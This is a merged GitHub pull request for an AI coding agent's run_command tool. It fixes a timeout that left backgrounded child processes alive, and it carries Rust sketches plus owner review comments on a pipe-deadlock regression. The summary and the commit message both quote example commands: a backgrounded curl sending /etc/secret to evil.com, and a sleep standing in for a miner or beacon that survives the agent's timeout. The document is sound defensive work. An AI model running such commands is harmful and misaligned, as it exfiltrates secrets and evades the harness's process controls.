
fix(security): kill descendant processes when run_command times out #34

Merged: enowdev merged 5 commits into enowdev:main from kevinnft:fix/run-command-process-group on May 19, 2026

@kevinnft
Contributor

Summary

Tokio's kill_on_drop(true) only kills the direct child (the shell enowx-coder spawns), not the shell's descendants. An agent can exploit this to leave long-running processes behind even after the timeout supposedly killed them:

run_command  sh -c '(curl evil.com -d @/etc/secret &)'
            # parent shell exits in milliseconds; backgrounded curl
            # keeps running for the full TCP timeout, exfiltrating
            # data even after the timeout fires and the tool call
            # returns "Command timed out".

run_command  sh -c '(sleep 3600 &)'
            # crypto miner, beacon, etc — survives forever.

Empirically confirmed: the orphan continues to run after the parent shell is dropped, because it inherits the parent process group and gets reparented to PID 1.
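
The orphaning behaviour can be reproduced outside the project with a small standard-library sketch. It assumes a Unix host with `sh` on the PATH and uses `std::process::Child::kill` as a stand-in for Tokio's `kill_on_drop`, since both signal only the direct child. The function names `is_alive` and `descendant_survives_direct_kill` are hypothetical and do not come from the PR.

```rust
use std::io::{self, BufRead, BufReader};
use std::process::{Command, Stdio};

/// Returns true if a process with `pid` still exists, probed with `kill -0`.
fn is_alive(pid: u32) -> io::Result<bool> {
    let status = Command::new("sh")
        .arg("-c")
        .arg(format!("kill -0 {} 2>/dev/null", pid))
        .status()?;
    Ok(status.success())
}

/// Kills only the direct child shell, then reports whether the `sleep`
/// it backgrounded is still running.
fn descendant_survives_direct_kill() -> io::Result<bool> {
    let mut shell = Command::new("sh")
        .arg("-c")
        .arg("sleep 5 & echo $!; wait")
        .stdin(Stdio::null())
        .stdout(Stdio::piped())
        .spawn()?;

    // The shell prints the PID of the backgrounded sleep as its first line.
    let stdout = shell.stdout.take().expect("stdout was piped");
    let mut line = String::new();
    BufReader::new(stdout).read_line(&mut line)?;
    let sleep_pid: u32 = line
        .trim()
        .parse()
        .map_err(|e| io::Error::new(io::ErrorKind::InvalidData, e))?;

    // SIGKILL goes to the shell only; the sleep shares its process group
    // but is never signalled.
    shell.kill()?;
    shell.wait()?;

    let survived = is_alive(sleep_pid)?;

    // Clean up the orphan so the sketch leaves nothing behind.
    let _ = Command::new("sh")
        .arg("-c")
        .arg(format!("kill -9 {} 2>/dev/null", sleep_pid))
        .status();

    Ok(survived)
}
```

Calling `descendant_survives_direct_kill()` is expected to return `Ok(true)`: the shell is gone, but the backgrounded `sleep` is still alive.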

Fix

  • Spawn the child in its own process group on Unix via process_group(0).
  • Capture the child PID before consuming the handle.
  • On timeout, killpg(SIGKILL) the entire group so every descendant the shell forked is killed, not just the shell itself.
  • Restructure I/O capture: drive stdout/stderr reads alongside wait() directly, since wait_with_output consumes the Child and we need it accessible for the kill path.

Adds libc as a Unix-only dependency (only used for killpg). Windows behavior is unchanged — kill_on_drop already terminates the cmd.exe job there.
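
The approach in the list above can be sketched with the standard library alone. This is not the PR's code: it uses blocking `std::process` with a polling loop instead of Tokio, and it declares `killpg` by hand rather than pulling in the `libc` crate, so that the example has no dependencies. It assumes a Unix host and a toolchain that accepts `unsafe extern` blocks (Rust 1.82 or later). The function name `run_with_group_timeout` and the 10 ms polling interval are hypothetical.

```rust
use std::io;
use std::os::unix::process::CommandExt;
use std::process::{Command, ExitStatus, Stdio};
use std::thread;
use std::time::{Duration, Instant};

// Hand-written declaration of the POSIX function; the PR uses libc::killpg.
unsafe extern "C" {
    fn killpg(pgrp: i32, sig: i32) -> i32;
}

// SIGKILL is signal 9 on Linux, macOS, and the BSDs.
const SIGKILL: i32 = 9;

/// Runs `script` under `sh -c` in its own process group.
/// Returns Ok(Some(status)) if the shell exits before `timeout`,
/// or Ok(None) after killing the whole group on timeout.
fn run_with_group_timeout(
    script: &str,
    timeout: Duration,
) -> io::Result<Option<ExitStatus>> {
    let mut child = Command::new("sh")
        .arg("-c")
        .arg(script)
        .stdin(Stdio::null())
        // 0 means "new group whose ID equals the child's PID".
        .process_group(0)
        .spawn()?;

    // Capture the PID up front; it doubles as the process group ID.
    let pgid = child.id() as i32;
    let deadline = Instant::now() + timeout;

    loop {
        if let Some(status) = child.try_wait()? {
            return Ok(Some(status));
        }
        if Instant::now() >= deadline {
            // Signal every process in the group, not just the shell.
            unsafe {
                killpg(pgid, SIGKILL);
            }
            // Reap the shell so it does not linger as a zombie.
            child.wait()?;
            return Ok(None);
        }
        thread::sleep(Duration::from_millis(10));
    }
}
```

With a script such as `(sleep 1; touch /tmp/proof) & sleep 30` and a 200 ms timeout, the function should return `Ok(None)` and the proof file should never appear, because the backgrounded subshell shares the killed group. A descendant that moves itself into a different group or session (for example via `setsid`) would not be covered by this sketch.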

Regression test

test_run_command_timeout_kills_backgrounded_children schedules a backgrounded descendant that would write a proof file 3 seconds after the parent shell exits. Before the fix the file appears; after the fix it does not.

Note

Built on top of #22 to inherit the clippy fixes, since main still has the 122-error block. Diff against main collapses to the executor + Cargo.toml changes once #22 lands.

Test plan

  • cargo test -p enowx-coder run_command_timeout — both the existing and the new tests pass
  • cargo clippy -- -D warnings clean
  • Manual on Linux: trigger run_command with (sleep 30 &) payload, confirm pgrep -f "sleep 30" is empty after timeout

Owner

@enowdev left a comment


Thanks for tackling the timeout escape. I’m blocking this as-is because run_command now drains stdout to EOF and only then drains stderr before wait() (src-tauri/src/tools/executor.rs:327-337). If the child writes enough to stderr while stdout is still being drained, the stderr pipe can fill, the child blocks on write, stdout never reaches EOF, and the timeout path becomes the only exit. This is a classic pipe deadlock regression compared with wait_with_output(), which reads both streams concurrently. Please switch to concurrent stdout/stderr draining (or another approach that preserves simultaneous consumption) before merging.
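
One way to keep both pipes drained while the `Child` handle stays available is sketched below. It is an illustration under assumptions, not the code that was merged: it uses blocking `std::process` with one reader thread per pipe, whereas the project runs on Tokio, where the same shape would typically be written by awaiting both reads and `wait()` together. The function name `capture_both` is hypothetical.

```rust
use std::io::{self, Read};
use std::process::{Command, Stdio};
use std::thread;

/// Runs `script` under `sh -c` and captures stdout and stderr concurrently.
/// Returns (stdout bytes, stderr bytes, whether the exit status was success).
fn capture_both(script: &str) -> io::Result<(Vec<u8>, Vec<u8>, bool)> {
    let mut child = Command::new("sh")
        .arg("-c")
        .arg(script)
        .stdin(Stdio::null())
        .stdout(Stdio::piped())
        .stderr(Stdio::piped())
        .spawn()?;

    // Taking the pipes leaves `child` usable for wait() or a kill path.
    let mut stdout = child.stdout.take().expect("stdout was piped");
    let mut stderr = child.stderr.take().expect("stderr was piped");

    // Each pipe gets its own reader, so neither can fill up while the
    // other is still being drained.
    let out_reader = thread::spawn(move || {
        let mut buf = Vec::new();
        stdout.read_to_end(&mut buf).map(|_| buf)
    });
    let err_reader = thread::spawn(move || {
        let mut buf = Vec::new();
        stderr.read_to_end(&mut buf).map(|_| buf)
    });

    let status = child.wait()?;
    let out = out_reader.join().expect("stdout reader panicked")?;
    let err = err_reader.join().expect("stderr reader panicked")?;
    Ok((out, err, status.success()))
}
```

A script that writes more than a pipe buffer's worth to stderr before touching stdout, such as `head -c 200000 /dev/zero >&2; head -c 200000 /dev/zero`, would hang a reader that drains stdout to EOF first, but completes with this version.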

Tokio's kill_on_drop only kills the direct child (the shell), not the
shell's descendants. An agent could exploit this to leave long-running
processes behind:

  run_command  sh -c '(curl evil.com -d @/etc/secret &)'
              # parent shell exits in milliseconds; backgrounded curl
              # keeps running for the full TCP timeout, exfiltrating
              # data even after the timeout fires and the tool call
              # returns "Command timed out".

  run_command  sh -c '(sleep 3600 &)'
              # crypto miner, beacon, etc — survives forever.

Empirically confirmed: with the previous code, the orphan continues to
run after the parent shell is dropped, because it inherits the parent
process group and is reparented to PID 1.

The fix:

- Spawn the child in its own process group on Unix (process_group(0)).
- Capture the child PID before consuming the handle.
- On timeout, killpg(SIGKILL) the entire group so every descendant
  the shell forked is killed, not just the shell itself.
- Restructure I/O capture to drive stdout/stderr reads alongside wait()
  instead of using wait_with_output, since we need the child handle to
  remain accessible for the kill path.

Adds libc as a Unix-only dependency (only used for killpg).

A regression test schedules a backgrounded descendant that would write
a proof file 3 seconds after the parent shell exits. Before the fix
the file appears; after the fix it does not.
@enowdev force-pushed the fix/run-command-process-group branch from c026153 to 57a46d8 on May 19, 2026 16:12
Owner

@enowdev left a comment


Conflict resolution is in and the timeout fix now keeps concurrent stdout/stderr consumption while still killing the full process group on timeout, so the earlier pipe-deadlock concern is addressed.

@enowdev merged commit 0c76ade into enowdev:main on May 19, 2026
2 checks passed
2 participants